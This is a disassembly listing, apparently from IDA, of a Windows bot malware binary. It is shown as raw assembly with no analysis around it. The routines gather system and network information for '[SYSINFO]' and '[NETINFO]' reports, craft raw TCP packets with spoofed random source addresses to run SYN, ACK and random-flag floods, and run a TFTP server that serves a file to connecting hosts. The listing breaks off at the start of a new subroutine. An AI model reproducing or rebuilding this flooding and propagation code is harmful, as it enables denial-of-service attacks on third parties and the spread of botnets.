loc_410F87: ; CODE XREF: sub_410E85+54�j
; sub_410E85+D1�j ...
mov ax, word_41F9E4
push 3Fh
mov [ebp+var_25C], ax
pop ecx
xor eax, eax
lea edi, [ebp+var_25A]
rep stosd
stosw
mov eax, dword_42EAB0
mov [ebp+var_C], 100h
cmp eax, ebx
jz short loc_410FC0
lea ecx, [ebp+var_C]
push ecx
lea ecx, [ebp+var_25C]
push ecx
call eax ; GetUserNameA
loc_410FC0: ; CODE XREF: sub_410E85+12C�j
push [ebp+arg_4]
call sub_408401
pop ecx
push eax
call dword_42EBF0 ; inet_addr
mov [ebp+var_8], eax
push 2
lea eax, [ebp+var_8]
push 4
push eax
call dword_42EB70 ; gethostbyaddr
cmp eax, ebx
jz short loc_410FE9
push dword ptr [eax]
jmp short loc_410FEE
; ---------------------------------------------------------------------------
loc_410FE9: ; CODE XREF: sub_410E85+15E�j
push offset aCouldnTResolve ; "couldn't resolve host"
loc_410FEE: ; CODE XREF: sub_410E85+162�j
lea eax, [ebp+var_3E4]
push eax ; Dest
call _sprintf
pop ecx
lea eax, [ebp+FullPath]
pop ecx
push 104h
push eax
call ds:dword_41B098 ; GetSystemDirectoryA
lea eax, [ebp+var_114]
push 46h
push eax
push offset aDdMmmYyyy ; "dd:MMM:yyyy"
push ebx
mov esi, 409h
push ebx
push esi
call ds:dword_41B0A0 ; GetDateFormatA
lea eax, [ebp+var_15C]
push 46h
push eax
push offset aHhMmSs ; "HH:mm:ss"
push ebx
push ebx
push esi
call ds:dword_41B09C ; GetTimeFormatA
push 20h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
push eax
call ds:dword_41B150 ; GlobalMemoryStatus
push ebx ; Ext
push ebx ; Filename
lea eax, [ebp+Drive]
push ebx ; Dir
push eax ; Drive
lea eax, [ebp+FullPath]
push eax ; FullPath
call __splitpath
lea eax, [ebp+Drive]
push eax
lea eax, [ebp+var_7E8]
push eax
call sub_403B59
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_7E8]
rep movsd
push 60h
lea esi, [ebp+var_7E8]
pop ecx
lea edi, [ebp+var_668]
rep movsd
push ebx
call sub_410D66
add esp, 20h
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_25C]
push eax
push [ebp+arg_4]
call sub_408401
pop ecx
push eax
lea eax, [ebp+var_3E4]
push eax
lea eax, [ebp+FullPath]
push eax
lea eax, [ebp+var_5E8]
push [ebp+var_C0]
push [ebp+var_C4]
push [ebp+var_C8]
push [ebp+var_4]
push eax
lea eax, [ebp+var_568]
push eax
mov eax, [ebp+var_2C]
shr eax, 0Ah
push ebx
push eax
call sub_403A49
pop ecx
pop ecx
push eax
mov eax, [ebp+var_30]
shr eax, 0Ah
push ebx
push eax
call sub_403A49
pop ecx
pop ecx
push eax
call sub_410DCF
push edx
push eax
push offset aSysinfoCpuI64u ; "[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB"...
push 200h ; Count
push [ebp+arg_0] ; Dest
call __snprintf
mov eax, [ebp+arg_0]
add esp, 50h
pop edi
pop esi
pop ebx
leave
retn
sub_410E85 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411139 proc near ; CODE XREF: sub_409557+3D0F�p
; sub_409557+4CAF�p
Dst = byte ptr -8Ch
var_C = byte ptr -0Ch
Dest = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8Ch
push esi
mov esi, 80h
push esi ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
cmp dword_42EC98, 0
jnz short loc_4111AD
push 0
lea eax, [ebp+Dst]
push esi
push eax
lea eax, [ebp+var_C]
push eax
call dword_42EA98 ; InternetGetConnectedStateEx
test eax, eax
jnz short loc_41118E
lea eax, [ebp+Dst]
push offset aNotConnected ; "Not connected"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41118E: ; CODE XREF: sub_411139+40�j
test [ebp+var_C], 1
jz short loc_4111A6
push offset aDialUp ; "Dial-up"
loc_411199: ; CODE XREF: sub_411139+72�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp short loc_4111CC
; ---------------------------------------------------------------------------
loc_4111A6: ; CODE XREF: sub_411139+59�j
push offset dword_427E24
jmp short loc_411199
; ---------------------------------------------------------------------------
loc_4111AD: ; CODE XREF: sub_411139+28�j
mov esi, offset off_427E20
lea eax, [ebp+Dest]
push esi ; Format
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push esi ; Format
push eax ; Dest
call _sprintf
add esp, 10h
loc_4111CC: ; CODE XREF: sub_411139+6B�j
push [ebp+arg_4]
push [ebp+arg_8]
call sub_408401
pop ecx
push eax
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+Dest]
push eax
push offset aNetinfoTypeSS_ ; "[NETINFO]: [Type]: %s (%s). [IP Address"...
push 200h ; Count
push [ebp+arg_0] ; Dest
call __snprintf
mov eax, [ebp+arg_0]
add esp, 1Ch
pop esi
leave
retn
sub_411139 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4111FF proc near ; DATA XREF: sub_409557+25AA�o
Dest = byte ptr -440h
var_240 = dword ptr -240h
var_23C = byte ptr -23Ch
Str = byte ptr -1BCh
var_13C = byte ptr -13Ch
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A0 = byte ptr -0A0h
var_9F = byte ptr -9Fh
var_8C = byte ptr -8Ch
var_80 = byte ptr -80h
var_78 = byte ptr -78h
Src = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_5B = byte ptr -5Bh
var_5A = word ptr -5Ah
Dst = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 440h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp+var_240]
rep movsd
push 1
xor ebx, ebx
pop esi
lea edi, [ebp+var_9F]
push 0Eh
mov [eax+19Ch], esi
pop ecx
xor eax, eax
mov [ebp+var_A0], bl
rep stosd
stosw
stosb
mov edi, ds:dword_41B078
call edi ; GetTickCount
push eax
call sub_41274C
pop ecx
push 0FFh
push 3
push 2
call dword_42EC30 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_4112C8
call dword_42EB50 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset aTcpErrorSocket ; "[TCP]: Error: socket() failed, returned"...
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_A8], ebx
jnz short loc_4112A8
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_AC] ; int
push eax ; int
lea eax, [ebp+var_13C]
push eax ; Str
push [ebp+var_240] ; int
call sub_405E64
add esp, 14h
loc_4112A8: ; CODE XREF: sub_4111FF+84�j
lea eax, [ebp+Dest]
push eax
call sub_402D63
push [ebp+var_BC]
call sub_411F56
pop ecx
pop ecx
push ebx
call ds:dword_41B06C ; ExitThread
loc_4112C8: ; CODE XREF: sub_4111FF+61�j
lea ecx, [ebp+var_34]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_34], esi
call dword_42EB94 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_411346
call dword_42EB50 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset aTcpErrorSetsoc ; "[TCP]: Error: setsockopt() failed, retu"...
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_A8], ebx
jnz short loc_411326
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_AC] ; int
push eax ; int
lea eax, [ebp+var_13C]
push eax ; Str
push [ebp+var_240] ; int
call sub_405E64
add esp, 14h
loc_411326: ; CODE XREF: sub_4111FF+102�j
lea eax, [ebp+Dest]
push eax
call sub_402D63
push [ebp+var_BC]
call sub_411F56
pop ecx
pop ecx
push ebx
call ds:dword_41B06C ; ExitThread
loc_411346: ; CODE XREF: sub_4111FF+DF�j
lea eax, [ebp+var_23C]
push eax
call dword_42EBF0 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_4113B6
lea eax, [ebp+Dest]
push offset aTcpInvalidTarg ; "[TCP]: Invalid target IP."
push eax ; Dest
call _sprintf
cmp [ebp+var_A8], ebx
pop ecx
pop ecx
jnz short loc_411396
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_AC] ; int
push eax ; int
lea eax, [ebp+var_13C]
push eax ; Str
push [ebp+var_240] ; int
call sub_405E64
add esp, 14h
loc_411396: ; CODE XREF: sub_4111FF+172�j
lea eax, [ebp+Dest]
push eax
call sub_402D63
push [ebp+var_BC]
call sub_411F56
pop ecx
pop ecx
push ebx
call ds:dword_41B06C ; ExitThread
loc_4113B6: ; CODE XREF: sub_4111FF+157�j
push 10h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push ebx
call dword_42EBB4 ; htons
mov [ebp+var_42], ax
lea eax, [ebp+var_23C]
push eax
call dword_42EBF0 ; inet_addr
mov [ebp+var_40], eax
mov [ebp+arg_0], ebx
call edi ; GetTickCount
mov [ebp+var_30], eax
loc_4113EE: ; CODE XREF: sub_4111FF+430�j
call edi ; GetTickCount
sub eax, [ebp+var_30]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_B4]
ja loc_4116B2
push 28h
mov [ebp+var_2C], 45h
call dword_42EBB4 ; htons
cmp [ebp+var_B0], ebx
mov [ebp+var_2A], ax
mov [ebp+var_28], si
mov [ebp+var_26], bx
mov [ebp+var_24], 80h
mov [ebp+var_23], 6
mov [ebp+var_22], bx
jz short loc_411461
call _rand
mov esi, eax
shl esi, 8
call _rand
add esi, eax
shl esi, 8
call _rand
add esi, eax
shl esi, 8
call _rand
add esi, eax
push 1
mov [ebp+var_20], esi
pop esi
jmp short loc_411477
; ---------------------------------------------------------------------------
loc_411461: ; CODE XREF: sub_4111FF+233�j
push [ebp+var_240]
call sub_408401
pop ecx
push eax
call dword_42EBF0 ; inet_addr
mov [ebp+var_20], eax
loc_411477: ; CODE XREF: sub_4111FF+260�j
mov eax, [ebp+var_40]
cmp [ebp+var_B8], ebx
mov [ebp+var_1C], eax
jnz short loc_411495
call _rand
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_41149B
; ---------------------------------------------------------------------------
loc_411495: ; CODE XREF: sub_4111FF+284�j
push [ebp+var_B8]
loc_41149B: ; CODE XREF: sub_4111FF+294�j
call dword_42EBB4 ; htons
mov [ebp+var_16], ax
call _rand
cdq
mov ecx, 401h
idiv ecx
push edx
call dword_42EBB4 ; htons
push 12345678h
mov [ebp+var_18], ax
call dword_42EBB0 ; htonl
mov [ebp+var_14], eax
lea eax, [ebp+Str]
push offset aSyn_0 ; "syn"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_4114EB
mov [ebp+var_10], ebx
mov [ebp+var_B], 2
jmp short loc_411547
; ---------------------------------------------------------------------------
loc_4114EB: ; CODE XREF: sub_4111FF+2E1�j
lea eax, [ebp+Str]
push offset aAck ; "ack"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_41150B
mov [ebp+var_10], ebx
mov [ebp+var_B], 10h
jmp short loc_411547
; ---------------------------------------------------------------------------
loc_41150B: ; CODE XREF: sub_4111FF+301�j
lea eax, [ebp+Str]
push offset aRandom ; "random"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_411547
call _rand
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_10], edx
call _rand
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+var_B], dl
loc_411547: ; CODE XREF: sub_4111FF+2EA�j
; sub_4111FF+30A�j ...
push 200h
mov [ebp+var_C], 50h
call dword_42EBB4 ; htons
mov [ebp+var_A], ax
mov eax, [ebp+var_20]
mov [ebp+Src], eax
mov eax, [ebp+var_1C]
push 14h
mov [ebp+var_6], bx
mov [ebp+var_8], bx
mov [ebp+var_60], eax
mov [ebp+var_5C], bl
mov [ebp+var_5B], 6
call dword_42EBB4 ; htons
mov [ebp+var_5A], ax
lea eax, [ebp+Src]
push 20h ; Size
push eax ; Src
lea eax, [ebp+var_A0]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_18]
push 14h ; Size
push eax ; Src
lea eax, [ebp+var_80]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_A0]
push 34h
push eax
call sub_40845A
mov [ebp+var_8], ax
lea eax, [ebp+var_2C]
push 14h ; Size
push eax ; Src
lea eax, [ebp+var_A0]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_18]
push 14h ; Size
push eax ; Src
lea eax, [ebp+var_8C]
push eax ; Dst
call _memcpy
push 4 ; Size
lea eax, [ebp+var_78]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 44h
lea eax, [ebp+var_A0]
push 28h
push eax
call sub_40845A
mov [ebp+var_22], ax
lea eax, [ebp+var_2C]
push 14h ; Size
push eax ; Src
lea eax, [ebp+var_A0]
push eax ; Dst
call _memcpy
add esp, 14h
lea eax, [ebp+Dst]
push 10h
push eax
push ebx
lea eax, [ebp+var_A0]
push 3Ch
push eax
push [ebp+var_4]
call dword_42EC14 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_411634
inc [ebp+arg_0]
jmp loc_4113EE
; ---------------------------------------------------------------------------
loc_411634: ; CODE XREF: sub_4111FF+42B�j
push [ebp+var_4]
call dword_42EC48 ; closesocket
call dword_42EB50 ; WSAGetLastError
push eax
lea eax, [ebp+var_23C]
push [ebp+arg_0]
push eax
push offset aTcpErrorSendin ; "[TCP]: Error sending packets to IP: %s."...
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 18h
cmp [ebp+var_A8], ebx
jnz short loc_411692
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_AC] ; int
push eax ; int
lea eax, [ebp+var_13C]
push eax ; Str
push [ebp+var_240] ; int
call sub_405E64
add esp, 14h
loc_411692: ; CODE XREF: sub_4111FF+46E�j
lea eax, [ebp+Dest]
push eax
call sub_402D63
push [ebp+var_BC]
call sub_411F56
pop ecx
pop ecx
push ebx
call ds:dword_41B06C ; ExitThread
loc_4116B2: ; CODE XREF: sub_4111FF+203�j
push [ebp+var_4]
call dword_42EC48 ; closesocket
mov eax, [ebp+arg_0]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_B4]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+var_23C]
push [ebp+arg_0]
push eax
lea eax, [ebp+Str]
push eax
lea eax, [ebp+Dest]
push offset aTcpDoneWithSFl ; "[TCP]: Done with %s flood to IP: %s. Se"...
push eax ; Dest
call _sprintf
add esp, 1Ch
cmp [ebp+var_A8], ebx
jnz short loc_411723
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_AC] ; int
push eax ; int
lea eax, [ebp+var_13C]
push eax ; Str
push [ebp+var_240] ; int
call sub_405E64
add esp, 14h
loc_411723: ; CODE XREF: sub_4111FF+4FF�j
lea eax, [ebp+Dest]
push eax
call sub_402D63
push [ebp+var_BC]
call sub_411F56
pop ecx
pop ecx
push ebx
call ds:dword_41B06C ; ExitThread
sub_4111FF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411743 proc near ; CODE XREF: sub_411743:loc_411C2E�p
; DATA XREF: sub_4022E3+107�o ...
var_884 = dword ptr -884h
var_880 = dword ptr -880h
Dest = byte ptr -780h
var_580 = byte ptr -580h
var_57F = byte ptr -57Fh
var_57E = byte ptr -57Eh
var_57D = byte ptr -57Dh
DstBuf = byte ptr -57Ch
var_37C = dword ptr -37Ch
Filename = byte ptr -378h
Str1 = byte ptr -274h
var_170 = dword ptr -170h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
Str = byte ptr -164h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_D8 = byte ptr -0D8h
var_D7 = byte ptr -0D7h
Str2 = byte ptr -0D6h
var_D5 = byte ptr -0D5h
var_58 = byte ptr -58h
Dst = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
File = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 884h
push ebx
push esi
push edi
mov edx, [ebp+arg_0]
mov esi, offset aOctet ; "octet"
lea edi, [ebp+var_1C]
movsd
push 1
xor ebx, ebx
movsw
pop eax
mov ecx, 0A9h
mov esi, edx
lea edi, [ebp+var_37C]
push ebx
push 2
rep movsd
inc [ebp+var_16C]
push 2
mov [ebp+var_C], eax
mov [edx+2A0h], eax
call dword_42EC30 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_10], edi
jnz short loc_411806
push 190h
call ds:dword_41B048 ; Sleep
call dword_42EB50 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset aTftpErrorSocke ; "[TFTP]: Error: socket() failed, returne"...
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_E0], ebx
jnz short loc_4117E6
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_E4] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_37C] ; int
call sub_405E64
add esp, 14h
loc_4117E6: ; CODE XREF: sub_411743+7E�j
lea eax, [ebp+Dest]
push eax
call sub_402D63
push [ebp+var_170]
call sub_411F56
pop ecx
pop ecx
push ebx
call ds:dword_41B06C ; ExitThread
loc_411806: ; CODE XREF: sub_411743+50�j
mov eax, [ebp+var_170]
push 10h ; Size
imul eax, 234h
push ebx ; Val
mov dword_43054C[eax], edi
lea eax, [ebp+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_168]
call dword_42EBB4 ; htons
mov [ebp+var_42], ax
lea eax, [ebp+Dst]
push 10h
push eax
push edi
mov [ebp+var_40], ebx
call dword_42EBE0 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_41186B
push 1388h
call ds:dword_41B048 ; Sleep
dec [ebp+var_16C]
push [ebp+arg_0]
jmp loc_411C2E
; ---------------------------------------------------------------------------
loc_41186B: ; CODE XREF: sub_411743+10D�j
lea eax, [ebp+Filename]
push offset Mode ; "rb"
push eax ; Filename
call _fopen
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+File], eax
jnz short loc_4118E9
push 190h
call ds:dword_41B048 ; Sleep
lea eax, [ebp+Filename]
push eax
lea eax, [ebp+Dest]
push offset aTftpFailedToOp ; "[TFTP]: Failed to open file: %s."
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_E4] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_37C] ; int
call sub_405E64
lea eax, [ebp+Dest]
push eax
call sub_402D63
push [ebp+var_170]
call sub_411F56
add esp, 28h
push ebx
call ds:dword_41B06C ; ExitThread
loc_4118E9: ; CODE XREF: sub_411743+140�j
mov esi, 200h
loc_4118EE: ; CODE XREF: sub_411743+4A5�j
mov eax, [ebp+arg_0]
cmp [eax+2A0h], ebx
jz loc_411BEE
mov [ebp+var_880], edi
mov edi, 80h
push edi ; Size
lea eax, [ebp+var_D8]
push ebx ; Val
push eax ; Dst
mov [ebp+var_34], 5
mov [ebp+var_30], 1388h
mov [ebp+var_884], 1
call _memset
add esp, 0Ch
lea eax, [ebp+var_34]
push eax
push ebx
lea eax, [ebp+var_884]
push ebx
push eax
push ebx
call dword_42EB9C ; select
test eax, eax
jle loc_411BE2
mov al, byte_428D64
mov ecx, edi
mov [ebp+var_580], al
xor eax, eax
lea edi, [ebp+var_57F]
mov [ebp+var_4], 10h
rep stosd
stosw
stosb
mov edi, [ebp+var_10]
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_2C]
push eax
push ebx
lea eax, [ebp+var_D8]
push 80h
push eax
push edi
call dword_42EB8C ; recvfrom
push [ebp+var_28]
mov [ebp+var_C], eax
call dword_42EC3C ; inet_ntoa
push eax ; Format
lea eax, [ebp+var_58]
push eax ; Dest
call _sprintf
cmp [ebp+var_D8], bl
pop ecx
pop ecx
jnz loc_411BCC
cmp [ebp+var_D7], 1
jnz loc_411B18
lea eax, [ebp+Str1]
push eax ; Str
call _strlen
lea eax, [ebp+eax+var_D5]
mov [ebp+var_14], eax
lea eax, [ebp+Str1]
push eax ; Str
call _strlen
push eax ; MaxCount
lea eax, [ebp+Str2]
push eax ; Str2
lea eax, [ebp+Str1]
push eax ; Str1
call _strncmp
add esp, 14h
test eax, eax
jnz loc_411AD2
lea eax, [ebp+var_1C]
push eax ; Str
call _strlen
push eax ; MaxCount
lea eax, [ebp+var_1C]
push [ebp+var_14] ; Str2
push eax ; Str1
call _strncmp
add esp, 10h
test eax, eax
jnz loc_411AD2
push ebx ; Origin
push ebx ; Offset
push [ebp+File] ; File
call _fseek
push [ebp+File] ; File
lea eax, [ebp+DstBuf]
mov [ebp+var_580], bl
mov [ebp+var_57F], 3
push esi ; Count
push 1 ; ElementSize
push eax ; DstBuf
mov [ebp+var_57E], bl
mov [ebp+var_57D], 1
call _fread
add esp, 1Ch
lea ecx, [ebp+var_2C]
mov [ebp+var_C], eax
add eax, 4
push [ebp+var_4]
push ecx
push ebx
push eax
lea eax, [ebp+var_580]
push eax
push edi
call dword_42EC14 ; sendto
lea eax, [ebp+Filename]
push eax
lea eax, [ebp+var_58]
push eax
push offset aTftpFileTran_0 ; "[TFTP]: File transfer started to IP: %s"...
loc_411A86: ; CODE XREF: sub_411743+484�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 10h
cmp [ebp+var_E0], ebx
jnz short loc_411AC0
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_E4] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_37C] ; int
call sub_405E64
add esp, 14h
loc_411AC0: ; CODE XREF: sub_411743+358�j
lea eax, [ebp+Dest]
push eax
call sub_402D63
pop ecx
jmp loc_411BE2
; ---------------------------------------------------------------------------
loc_411AD2: ; CODE XREF: sub_411743+2B6�j
; sub_411743+2D7�j
push [ebp+var_4]
lea eax, [ebp+var_2C]
push eax
push ebx
push 13h
push offset dword_427FB8
push edi
call dword_42EC14 ; sendto
lea eax, [ebp+Str1]
push eax
lea eax, [ebp+var_58]
push eax
lea eax, [ebp+var_D8]
push offset aTftpFileNotFou ; "[TFTP]: File not found: %s (%s)."
push eax ; Dest
call _sprintf
lea eax, [ebp+var_D8]
push eax
call sub_402D63
add esp, 14h
jmp loc_411BE2
; ---------------------------------------------------------------------------
loc_411B18: ; CODE XREF: sub_411743+275�j
cmp [ebp+var_D7], 4
jnz loc_411BCC
mov cl, [ebp+var_D5]
mov al, [ebp+Str2]
cmp cl, 0FFh
mov [ebp+var_580], bl
mov [ebp+var_57F], 3
jnz short loc_411B55
inc al
xor cl, cl
mov [ebp+var_57E], al
mov [ebp+var_57D], bl
jmp short loc_411B63
; ---------------------------------------------------------------------------
loc_411B55: ; CODE XREF: sub_411743+3FE�j
inc cl
mov [ebp+var_57E], al
mov [ebp+var_57D], cl
loc_411B63: ; CODE XREF: sub_411743+410�j
movzx eax, al
movzx ecx, cl
shl eax, 8
add eax, ecx
push ebx ; Origin
shl eax, 9
sub eax, esi
push eax ; Offset
push [ebp+File] ; File
call _fseek
push [ebp+File] ; File
lea eax, [ebp+DstBuf]
push esi ; Count
push 1 ; ElementSize
push eax ; DstBuf
call _fread
add esp, 1Ch
mov edi, eax
lea eax, [ebp+var_2C]
mov [ebp+var_C], edi
push [ebp+var_4]
push eax
lea eax, [edi+4]
push ebx
push eax
lea eax, [ebp+var_580]
push eax
push [ebp+var_10]
call dword_42EC14 ; sendto
cmp edi, ebx
jnz short loc_411BE2
lea eax, [ebp+Filename]
push eax
lea eax, [ebp+var_58]
push eax
push offset aTftpFileTran_1 ; "[TFTP]: File transfer complete to IP: %"...
jmp loc_411A86
; ---------------------------------------------------------------------------
loc_411BCC: ; CODE XREF: sub_411743+268�j
; sub_411743+3DC�j
push [ebp+var_4]
lea eax, [ebp+var_2C]
push eax
push ebx
push 9
push offset dword_427F58
push edi
call dword_42EC14 ; sendto
loc_411BE2: ; CODE XREF: sub_411743+204�j
; sub_411743+38A�j ...
cmp [ebp+var_C], ebx
mov edi, [ebp+var_10]
jg loc_4118EE
loc_411BEE: ; CODE XREF: sub_411743+1B4�j
push edi
call dword_42EC48 ; closesocket
push [ebp+File] ; File
call _fclose
mov esi, [ebp+arg_0]
dec [ebp+var_16C]
pop ecx
cmp [esi+2A0h], ebx
jnz short loc_411C22
push [ebp+var_170]
call sub_411F56
pop ecx
push ebx
call ds:dword_41B06C ; ExitThread
loc_411C22: ; CODE XREF: sub_411743+4CA�j
push 3E8h
call ds:dword_41B048 ; Sleep
push esi
loc_411C2E: ; CODE XREF: sub_411743+123�j
call sub_411743
pop edi
pop esi
pop ebx
leave
retn 4
sub_411743 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_411C3A(char *Source,int,int)
sub_411C3A proc near ; CODE XREF: sub_4022E3+F0�p
; sub_4022E3+20F�p ...
Source = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
xor edi, edi
mov eax, offset dword_430340
loc_411C42: ; CODE XREF: sub_411C3A+18�j
cmp byte ptr [eax], 0
jz short loc_411C56
add eax, 234h
inc edi
cmp eax, offset dword_4750D0
jl short loc_411C42
jmp short loc_411CA1
; ---------------------------------------------------------------------------
loc_411C56: ; CODE XREF: sub_411C3A+B�j
push esi
mov esi, edi
imul esi, 234h
push 1FFh ; Count
push [esp+0Ch+Source] ; Source
lea eax, dword_430340[esi]
push eax ; Dest
call _strncpy
mov eax, [esp+14h+arg_4]
add esp, 0Ch
mov dword_430540[esi], eax
and dword_430544[esi], 0
mov eax, [esp+8+arg_8]
and dword_430548[esi], 0
mov dword_43054C[esi], eax
and byte_430558[esi], 0
pop esi
loc_411CA1: ; CODE XREF: sub_411C3A+1A�j
mov eax, edi
pop edi
retn
sub_411C3A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411CA5 proc near ; DATA XREF: sub_409557+4E96�o
var_98 = dword ptr -98h
Str = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 98h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
rep movsd
push [ebp+var_10] ; int
mov dword ptr [eax+94h], 1
lea eax, [ebp+Str]
push [ebp+var_C] ; int
push eax ; Str
push [ebp+var_98] ; int
call sub_411CF7
push [ebp+var_14]
call sub_411F56
add esp, 14h
push 0
call ds:dword_41B06C ; ExitThread
pop edi
pop esi
sub_411CA5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_411CF7(int,char *Str,int,int)
sub_411CF7 proc near ; CODE XREF: sub_411CA5+38�p
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0 ; int
push [ebp+arg_8] ; int
push offset aThreadList ; "-[Thread List]-"
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 14h
xor edi, edi
mov esi, offset dword_430340
loc_411D21: ; CODE XREF: sub_411CF7+78�j
cmp byte ptr [esi], 0
jz short loc_411D62
cmp [ebp+arg_C], 0
jnz short loc_411D35
cmp dword ptr [esi+204h], 0
jnz short loc_411D62
loc_411D35: ; CODE XREF: sub_411CF7+33�j
push esi
push edi
lea eax, [ebp+Dest]
push offset aD_S ; "%d. %s"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 24h
loc_411D62: ; CODE XREF: sub_411CF7+2D�j
; sub_411CF7+3C�j
add esi, 234h
inc edi
cmp esi, offset dword_4750D0
jl short loc_411D21
pop edi
pop esi
leave
retn
sub_411CF7 endp
; =============== S U B R O U T I N E =======================================
sub_411D75 proc near ; CODE XREF: sub_409557+4150�p
